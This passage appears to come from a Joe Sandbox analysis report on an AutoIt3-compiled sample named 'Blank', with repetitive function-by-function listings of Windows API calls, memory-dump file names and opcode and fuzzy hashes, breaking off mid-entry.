                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                    • Opcode ID: 8e9a1413d49aa98ea6a0a8f1f936bc47abb4cb43b7b6fddba0c6cfb0fc22659f
                                                                                                                                    • Instruction ID: 091aa9e8da9e9f5559711b5be26a21118200df3cb41d8bdcd8eb0fe27b661400
                                                                                                                                    • Opcode Fuzzy Hash: 8e9a1413d49aa98ea6a0a8f1f936bc47abb4cb43b7b6fddba0c6cfb0fc22659f
                                                                                                                                    • Instruction Fuzzy Hash: EFE0C931545228BADB215FA2AD4DEE77F6CEF157F1F008025F609D9091C6718560CBB1
                                                                                                                                    Function 002625F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000008), ref: 0026260D
                                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00262617
                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0026262C
                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00262634
                                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 0029C1C4
                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0029C1D1
                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0029C1EA
                                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0029C203
                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0029C223
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0029C22E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1946975507-0
                                                                                                                                    • Opcode ID: c0aef90b27ac6a0b4b8f1a040440340e0ec166f8ff318566ca64f4c4795cd4a3
                                                                                                                                    • Instruction ID: 9caace0fe89421a48ee80afc23123e74f5c3047e9ed8d648bf1bd3bcdce7c76e
                                                                                                                                    • Opcode Fuzzy Hash: c0aef90b27ac6a0b4b8f1a040440340e0ec166f8ff318566ca64f4c4795cd4a3
                                                                                                                                    • Instruction Fuzzy Hash: CEE06D31504244BBEF215FA8BC8DBE93B15EB05372F148376FA6D480E2877249A0DB12
                                                                                                                                    Function 002B9330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 002B9339
                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,002B8F04), ref: 002B9340
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002B8F04), ref: 002B934D
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,002B8F04), ref: 002B9354
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                    • Opcode ID: 5d27ee2746aeb298e5ee75aaddb1b4f3f6a982667e4b826ce540ddeb19f3e2a7
                                                                                                                                    • Instruction ID: d300758958599536c9b7aecb1faff60d3d23955ecf30c6caa01f9437d7ef0e3f
                                                                                                                                    • Opcode Fuzzy Hash: 5d27ee2746aeb298e5ee75aaddb1b4f3f6a982667e4b826ce540ddeb19f3e2a7
                                                                                                                                    • Instruction Fuzzy Hash: BAE086326052129FD7201FB17D4DBBA3BACEF517F1F114868F745C9091EA349444C760
                                                                                                                                    Function 002A0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDesktopWindow.USER32 ref: 002A0679
                                                                                                                                    • GetDC.USER32(00000000), ref: 002A0683
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002A06A3
                                                                                                                                    • ReleaseDC.USER32(?), ref: 002A06C4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                    • Opcode ID: a25f8c7cfe98888901d16af2ad0fc3c973832dbe776cc5ff29a774e9c27e2584
                                                                                                                                    • Instruction ID: 71876fb0b27b12f127fdd2837e18b770a530d320a7f6c8abf447b56ffa5697b5
                                                                                                                                    • Opcode Fuzzy Hash: a25f8c7cfe98888901d16af2ad0fc3c973832dbe776cc5ff29a774e9c27e2584
                                                                                                                                    • Instruction Fuzzy Hash: C4E0E5B5810204EFCF019F60E88CA6D7BB9AB8C3A4F118029F85AE7211DB7885A1DF50
                                                                                                                                    Function 002A068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDesktopWindow.USER32 ref: 002A068D
                                                                                                                                    • GetDC.USER32(00000000), ref: 002A0697
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002A06A3
                                                                                                                                    • ReleaseDC.USER32(?), ref: 002A06C4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                    • Opcode ID: b4cdff7056a9ebfd6a083f098c6cc99b157aa135aba92c215c7f407fa1939708
                                                                                                                                    • Instruction ID: def40cda2ace71b7441be1dea84017cbacb93b617dc4cf2b846c273f77c986ac
                                                                                                                                    • Opcode Fuzzy Hash: b4cdff7056a9ebfd6a083f098c6cc99b157aa135aba92c215c7f407fa1939708
                                                                                                                                    • Instruction Fuzzy Hash: BBE01AB5800204EFCF019F60E84C66D7BF9AB8C3A4F108028F95AE7211DB789551CF50
                                                                                                                                    Function 0027278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002749C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002727AF,?,00000001), ref: 002749F4
                                                                                                                                    • _free.LIBCMT ref: 002AFB04
                                                                                                                                    • _free.LIBCMT ref: 002AFB4B
                                                                                                                                      • Part of subcall function 002729BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00272ADF
                                                                                                                                    Strings
                                                                                                                                    • Bad directive syntax error, xrefs: 002AFB33
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                    • String ID: Bad directive syntax error
                                                                                                                                    • API String ID: 2861923089-2118420937
                                                                                                                                    • Opcode ID: 4ee19026a70e0c4c82db260c70e161d84ec7cc1b952505b6d83def3b947a01a8
                                                                                                                                    • Instruction ID: 7acb398e867bfc9b5b9210e4bc1becb8afcd47368723ddac87ccf932aafb14c0
                                                                                                                                    • Opcode Fuzzy Hash: 4ee19026a70e0c4c82db260c70e161d84ec7cc1b952505b6d83def3b947a01a8
                                                                                                                                    • Instruction Fuzzy Hash: AE91717192021AEFCF54EFA4CD919EEB7B4BF05310F10452AF819AB2A1DB749925CF50
                                                                                                                                    Function 002BBE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 002BC057
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContainedObject
                                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                                    • API String ID: 3565006973-3941886329
                                                                                                                                    • Opcode ID: 28333a5eb5a67c2e275d2ec09943dde404c55e67f38d0468b3224aa05b847c4e
                                                                                                                                    • Instruction ID: 4a7573952425d72360fa10a4fbca5062eda0c476c713067693c264af74112eec
                                                                                                                                    • Opcode Fuzzy Hash: 28333a5eb5a67c2e275d2ec09943dde404c55e67f38d0468b3224aa05b847c4e
                                                                                                                                    • Instruction Fuzzy Hash: B0915B74220602EFDB14DF64C884AAABBF5FF49750F20846DF90ADB691DBB1E851CB50
                                                                                                                                    Function 002CB5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0027436A: _wcscpy.LIBCMT ref: 0027438D
                                                                                                                                      • Part of subcall function 00264D37: __itow.LIBCMT ref: 00264D62
                                                                                                                                      • Part of subcall function 00264D37: __swprintf.LIBCMT ref: 00264DAC
                                                                                                                                    • __wcsnicmp.LIBCMT ref: 002CB670
                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002CB739
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                    • String ID: LPT
                                                                                                                                    • API String ID: 3222508074-1350329615
                                                                                                                                    • Opcode ID: bd8b448812c5740df696c9b28cace3aa971e336c22abe3c45119a1303c56291c
                                                                                                                                    • Instruction ID: 4f137caa6f8d48f4ffe5f7cfe143bdf38293d61acb9056d831f47b134943a2b3
                                                                                                                                    • Opcode Fuzzy Hash: bd8b448812c5740df696c9b28cace3aa971e336c22abe3c45119a1303c56291c
                                                                                                                                    • Instruction Fuzzy Hash: E8619276A20215AFCB15EF54C882FAEB7B8EF48310F10815DF946AB391D770AE94CB50
                                                                                                                                    Function 002A7190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove
                                                                                                                                    • String ID: #V'
                                                                                                                                    • API String ID: 4104443479-2359389714
                                                                                                                                    • Opcode ID: bc3899880f4b50a8636fc0689195bb8c639fe3f012e5a80f42839aa891795776
                                                                                                                                    • Instruction ID: 4e5dfe17a62c55202eef1095f027aea5510504b2cab9a86835ce36c72529dd1b
                                                                                                                                    • Opcode Fuzzy Hash: bc3899880f4b50a8636fc0689195bb8c639fe3f012e5a80f42839aa891795776
                                                                                                                                    • Instruction Fuzzy Hash: 8B51737091060ADFCF24CFA8C894AAEB7F1FF45314F24852AE85AD7250EB31A965CF51
                                                                                                                                    Function 0026E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 0026E01E
                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0026E037
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                    • Opcode ID: d44e45369970c489e7dceba17a131801048b8127abda0cc7e54def6a404fb78d
                                                                                                                                    • Instruction ID: 3a32de04af85c95e5154bf56ed387867d78d10ff0325ce26e40ef6a05f6b1e30
                                                                                                                                    • Opcode Fuzzy Hash: d44e45369970c489e7dceba17a131801048b8127abda0cc7e54def6a404fb78d
                                                                                                                                    • Instruction Fuzzy Hash: 875158714187449BE321AF50E886BABBBECFB85314F51885DF1D8411A1EB709578CB26
                                                                                                                                    Function 002748B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove
                                                                                                                                    • String ID: AU3! ?/$EA06
                                                                                                                                    • API String ID: 4104443479-1732019733
                                                                                                                                    • Opcode ID: 37959e145e7d0748d75c8f843d012dd01251f40dcc4318b1e185340d92ee236c
                                                                                                                                    • Instruction ID: 4d562c0a495f1666be4027bad37f02ea2dba9ba2525d1fad26b8ca9ce3734141
                                                                                                                                    • Opcode Fuzzy Hash: 37959e145e7d0748d75c8f843d012dd01251f40dcc4318b1e185340d92ee236c
                                                                                                                                    • Instruction Fuzzy Hash: 97418E21A24198DBDF22AF5488917BF7BA58B55300F14C065E98AA7286D7318DB4C7E2
                                                                                                                                    Function 002C9CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00274AB2: __fread_nolock.LIBCMT ref: 00274AD0
                                                                                                                                    • _wcscmp.LIBCMT ref: 002C9DE1
                                                                                                                                    • _wcscmp.LIBCMT ref: 002C9DF4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                                                                    • String ID: FILE
                                                                                                                                    • API String ID: 4029003684-3121273764
                                                                                                                                    • Opcode ID: c7fb5caea478ec60b709a449e0c19a552fb74b3d3636a25740dce3546d40e56f
                                                                                                                                    • Instruction ID: 5732d18087c9f179496bf64042725bdf36150735bef36db6b541f29d1c2f0456
                                                                                                                                    • Opcode Fuzzy Hash: c7fb5caea478ec60b709a449e0c19a552fb74b3d3636a25740dce3546d40e56f
                                                                                                                                    • Instruction Fuzzy Hash: B641E671A5020ABADF21EEA4CC49FEFB7BDDF49710F00446AF904A7180D7719954CBA5
                                                                                                                                    Function 002E8096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002E8186
                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002E819B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: '
                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                    • Opcode ID: df246b5e39d4dd747e341970a9e55b46620127998f8a15bd9cf9fb6a77c58db5
                                                                                                                                    • Instruction ID: aba0524b69c52d061ea56f6bb7148b15bd799f62d7d1e624cc2d47842dd1d06f
                                                                                                                                    • Opcode Fuzzy Hash: df246b5e39d4dd747e341970a9e55b46620127998f8a15bd9cf9fb6a77c58db5
                                                                                                                                    • Instruction Fuzzy Hash: C4412A74A5024A9FDB10CF65C881BEA7BF9FB08300F50016AE948EB351DB71A956CF90
                                                                                                                                    Function 002D2C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002D2C6A
                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002D2CA0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CrackInternet_memset
                                                                                                                                    • String ID: |
                                                                                                                                    • API String ID: 1413715105-2343686810
                                                                                                                                    • Opcode ID: d0129066ef0fd25fd2cda66500e6131209e7a0f747427fb8746a4a96a585c082
                                                                                                                                    • Instruction ID: 77518f1578a094f7493ac11d0deb13b85839821ff58f12166e82242cae3c1825
                                                                                                                                    • Opcode Fuzzy Hash: d0129066ef0fd25fd2cda66500e6131209e7a0f747427fb8746a4a96a585c082
                                                                                                                                    • Instruction Fuzzy Hash: 7C311971C20119EBDF11EFA4CC85AEEBFB9FF15310F10405AF819A6262DA715926DFA0
                                                                                                                                    Function 002E7088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 002E713C
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002E7178
                                                                                                                                    Strings
